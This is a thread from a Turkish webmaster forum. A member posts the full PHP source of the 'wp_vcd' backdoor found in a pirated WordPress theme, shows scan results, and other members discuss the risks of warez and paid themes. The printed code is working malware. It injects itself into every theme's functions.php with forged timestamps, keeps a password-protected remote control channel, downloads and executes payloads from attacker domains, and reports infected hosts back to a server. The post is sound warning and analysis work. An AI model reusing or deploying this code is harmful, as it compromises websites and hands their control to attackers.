DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
//1gzWmpaQ0k3Q2drS

$GLOBALS['WP_CD_CODE'] = 'if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}








$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='e864caaafae387436ac66d4100771e89';
if (($tmpcontent = @file_get_contents("http://www.yarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.yarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.yarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>';

$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');

$GLOBALS['DIR_ARRAY'] = Array();
$dirs = Array();

$search = Array(
Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);

function getDirList($path)
{
if ($dir = @opendir($path))
{
$result = Array();

while (($filename = @readdir($dir)) !== false)
{
if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
$result[] = $path . '/' . $filename;
}

return $result;
}

return false;
}

function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
}
}
}

function SearchFile($search, $path)
{
if ($dir = @opendir($path))
{
$i = 0;
while (($filename = @readdir($dir)) !== false)
{
if ($i > MAX_ITERATION) break;
$i++;
if ($filename != '.' && $filename != '..')
{
if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
{
SearchFile($search, $path . '/' . $filename);
}
else
{
foreach ($search as $_)
{
if (strtolower($filename) == strtolower($_['file']))
{
$GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
}
}
}
}
}
}
}

if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) {

if (isset($_GET['plugin']))
{
global $wpdb ;
}

$install_code = 'if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}








$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='e864caaafae387436ac66d4100771e89';
if (($tmpcontent = @file_get_contents("http://www.yarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.yarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.yarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>';

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));


$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}

}

else
{

$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping2 = true;
}
}

}



}

}








}

if ($ping) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

if ($ping2) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}

}


for ($i = 0; $i {
$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
}

foreach ($dirs as $dir)
{
foreach (@getDirList($dir) as $__)
{
@SearchFile($search, $__);
}
}

foreach ($GLOBALS['DIR_ARRAY'] as $e)
{
//print_r($e);

if ($file = file_get_contents($e[1]))
{
WP_URL_CD(dirname($e[1]));

if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt))
{
if ($salt[1] != AUTH_SALT)
{
// WP_URL_CD(dirname($e[1]));
//echo dirname($e[1]);
}
}
}
}

if ($file = @file_get_contents(__FILE__))
{
$file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
$file = preg_replace('!<\?php\s*\?>!s', '', $file);
@file_put_contents(__FILE__, $file);
}

}

//install_code_end

?>




Virüslü tema tarama sonucu:

Virüstotal sonuç

Temizlediğim tema tarama sonucu:

Virüstotal sonuç
Hayalperest Penunbra vahdettin

kişi bu mesajı beğendi.

elektronikssl
webimgo

muhendis26 muhendis26 Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 04.10.2018
  • Yaş/Cinsiyet 32 / E
  • Meslek makina müh.
  • Konum Antalya
  • Ad Soyad H** G**
  • Mesajlar 203
  • Beğeniler 53 / 68
  • Ticaret 0, (%0)
Warezciler hayrına dagitmiyordur tabi :) ama parayla aldığınız temalarada scriptlerede yapımcılar bir şekilde arka kapı aciyorlar yani orijinal alsanizda sizden başkası sitenize erişebilir vs
Penunbra

kişi bu mesajı beğendi.

panel34 panel34 Kimlik Onayı Bekliyor Banlı Kullanıcı
  • Üyelik 09.01.2019
  • Yaş/Cinsiyet 36 / E
  • Meslek E-ticaret
  • Konum İstanbul Anadolu
  • Ad Soyad H** A**
  • Mesajlar 90
  • Beğeniler 13 / 23
  • Ticaret 0, (%0)
Warez temalarda bu tür olaylar normal zaten. Bu kodu yazan arkadaş acemi biraz sanırım. Ben incelediğimde öyle garip ve profesyonel kodlar görüyorum ki adam sadece tek satır 30-40 karakterlik kod yazmış :D
vahdettin

kişi bu mesajı beğendi.

dataaaa dataaaa WM Aracı Kullanıcı
  • Üyelik 27.12.2018
  • Yaş/Cinsiyet 28 / E
  • Meslek Öğrenci
  • Konum İzmir
  • Ad Soyad Y** S**
  • Mesajlar 329
  • Beğeniler 216 / 85
  • Ticaret 2, (%100)
Emeğine sağlık değerli arkadaşım. Güzel bir çalışma olmuş. Saygılarla :)
 

 

wmaraci
wmaraci

Escalous Escalous Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 09.08.2018
  • Yaş/Cinsiyet 24 / E
  • Meslek (.*?)
  • Konum Diğer
  • Ad Soyad A** Ş**
  • Mesajlar 1392
  • Beğeniler 421 / 799
  • Ticaret 4, (%100)

muhendis26 adlı üyeden alıntı

Warezciler hayrına dagitmiyordur tabi :) ama parayla aldığınız temalarada scriptlerede yapımcılar bir şekilde arka kapı aciyorlar yani orijinal alsanizda sizden başkası sitenize erişebilir vs


Hocam bu söylediğinize örnek verebilirmisiniz ? Themeforsetten indirdiğim hiçbir temada en ufak bir zararliya rastlamadım.
Linuxer

kişi bu mesajı beğendi.

VipTema VipTema Vip Tema Web Tasarım Kullanıcı
  • Üyelik 29.06.2011
  • Yaş/Cinsiyet 37 / E
  • Meslek Vip Tema Web Tasarım A.Ş.
  • Konum Tekirdağ
  • Ad Soyad Ö** I**
  • Mesajlar 1393
  • Beğeniler 704 / 703
  • Ticaret 21, (%100)
Warez indirip warezden sikayet etmek bu ne yaman çelişki hocam.
 

 

Linuxer Linuxer WMARACI Banlı Kullanıcı
  • Üyelik 29.12.2018
  • Yaş/Cinsiyet 33 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad R** D**
  • Mesajlar 205
  • Beğeniler 94 / 42
  • Ticaret 0, (%0)

muhendis26 adlı üyeden alıntı

Warezciler hayrına dagitmiyordur tabi :) ama parayla aldığınız temalarada scriptlerede yapımcılar bir şekilde arka kapı aciyorlar yani orijinal alsanizda sizden başkası sitenize erişebilir vs


Hocam onun için güvenilir firmalarla alışveriş yapmak gerek. Birde olaki dediğiniz gibi durum olsa dahi belli başlı firmaların giripte sitenize zarar vereceğini sanmıyorum. Bu illegal ile uğraşanların aralarına farklı adlarla giriyorum neler yaptığını bilip öğrenmek için bir nevi saldırgan savunma stratejisi için, niyetleri sitelerde arka kapı bırakıp backlink alma yada reklam kodlarınızı kendi reklamları ile değiştirme yada index atma gibi amaçlarla uğraşıyorlar.



panel34 adlı üyeden alıntı

Warez temalarda bu tür olaylar normal zaten. Bu kodu yazan arkadaş acemi biraz sanırım. Ben incelediğimde öyle garip ve profesyonel kodlar görüyorum ki adam sadece tek satır 30-40 karakterlik kod yazmış :D


Hocam doğru söylüyorsunuz ama bu kadar acemi bile olmasına rağmen haddinden fazla indiriliyor temaları.


dataaaa adlı üyeden alıntı

Emeğine sağlık değerli arkadaşım. Güzel bir çalışma olmuş. Saygılarla :)


Rica ederim önemli değil.



Okan_IŞIK adlı üyeden alıntı

Warez indirip warezden sikayet etmek bu ne yaman çelişki hocam.


Hocam sanırım siz konuyu okumadınız, temayı ben indirmedim Buradaki konuya yardımcı olmak için inceledim.
 

 

muhendis26 muhendis26 Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 04.10.2018
  • Yaş/Cinsiyet 32 / E
  • Meslek makina müh.
  • Konum Antalya
  • Ad Soyad H** G**
  • Mesajlar 203
  • Beğeniler 53 / 68
  • Ticaret 0, (%0)

Escalous adlı üyeden alıntı

Hocam bu söylediğinize örnek verebilirmisiniz ? Themeforsetten indirdiğim hiçbir temada en ufak bir zararliya rastlamadım.


Script aldım 2yil önce asp script sahibi kendi sitesinin linklerini gizleyerek sitem uzerinden backlink kastigini öğrendim. konu sahibi arkadaşın dediği gibi büyük yerler yapmaz böyle şeyler belki ama tema sahipleri kendileri için açık kapı bırakır virüs çıkar yada çıkmaz onun kod yazma profesyonelligine kalmış orası biraz
 

 

VipTema VipTema Vip Tema Web Tasarım Kullanıcı
  • Üyelik 29.06.2011
  • Yaş/Cinsiyet 37 / E
  • Meslek Vip Tema Web Tasarım A.Ş.
  • Konum Tekirdağ
  • Ad Soyad Ö** I**
  • Mesajlar 1393
  • Beğeniler 704 / 703
  • Ticaret 21, (%100)
Hocam sanırım siz konuyu okumadınız, temayı ben indirmedim Buradaki konuya yardımcı olmak için inceledim.

Konuyu okumuştum bir önceki konuyu da aynı kişisiniz sandım özür dilerim :)
Linuxer

kişi bu mesajı beğendi.

Linuxer Linuxer WMARACI Banlı Kullanıcı
  • Üyelik 29.12.2018
  • Yaş/Cinsiyet 33 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad R** D**
  • Mesajlar 205
  • Beğeniler 94 / 42
  • Ticaret 0, (%0)

Okan_IŞIK adlı üyeden alıntı

Konuyu okumuştum bir önceki konuyu da aynı kişisiniz sandım özür dilerim :)


Est. hocam rica ederim.
VipTema

kişi bu mesajı beğendi.

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al